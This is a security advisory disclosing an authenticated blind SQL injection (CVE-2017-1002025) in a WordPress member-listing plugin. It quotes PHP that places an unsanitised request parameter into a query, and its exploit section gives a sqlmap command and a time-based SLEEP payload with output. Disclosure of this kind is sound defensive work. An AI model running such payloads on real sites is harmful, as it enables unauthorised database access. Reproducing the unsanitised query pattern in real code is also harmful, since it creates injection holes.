Advisory #: 196
Title: Authenticated blind SQL injection in add-edit-delete-listing-for-member-module v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2017-06-21
CVE-ID:[CVE-2017-1002025]
CWE:
Download Site: https://wordpress.org/plugins/add-edit-delete-listing-for-member-module/
Vendor: Romal Patel
Vendor Notified: 2017-07-05
Vendor Contact: niraj.patel.it@gmail.com
Advisory:
Description: This plugin used for add edit delete and listing module at admin side.
Vulnerability:
The plugin author does not sanitize user supplied input via $act before passing it into an SQL statement. This allows a user logged in as administrator to inject SQL statements into the query. 3- require_once("memberclass.php"); 4- $objMem = new memberClass(); 5- 6: $addme=$_POST["addme"]; 7- global $wpdb; . . 22: $act=$_REQUEST["act"]; 23- if($act=="upd") 24- { 25: $recid=$_REQUEST["id"]; 26- $sSQL="select * from ".$table_name = $wpdb->prefix . "member where id=$recid"; 27- $result = $wpdb->get_results($sSQL); 28- $result = $result[0]; 29- if (sizeof($result) > 0 ) 30- {
Export: JSON TEXT XML
Exploit Code:
  1. $ sqlmap -u 'http://example.com/wp-admin/admin.php?page=member_add&act=upd&id=*' --load-cookies=./cookie.txt --level=2 --risk=2 --dbms=mysql 
  2. sqlmap identified the following injection point(s) with a total of 339 HTTP(s) requests:
  3. ---
  4. Parameter: #1* (URI)
  5.     Type: AND/OR time-based blind
  6.     Title: MySQL >= 5.0.12 time-based blind - Parameter replace
  7.     Payload: http://example.com:80/wp-admin/admin.php?page=member_add&act=upd&id=(CASE WHEN (1410=1410) THEN SLEEP(5) ELSE 1410 END)
  8. ---
  9. [21:59:47] [INFO] the back-end DBMS is MySQL
  10. web server operating system: Linux Ubuntu 16.04 (xenial)
  11. web application technology: Apache 2.4.18
  12. back-end DBMS: MySQL >= 5.0.12
  13. [21:59:47] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'
  14.  
  15. [*] shutting down at 21:59:47
  16.  
Screen Shots:
Notes: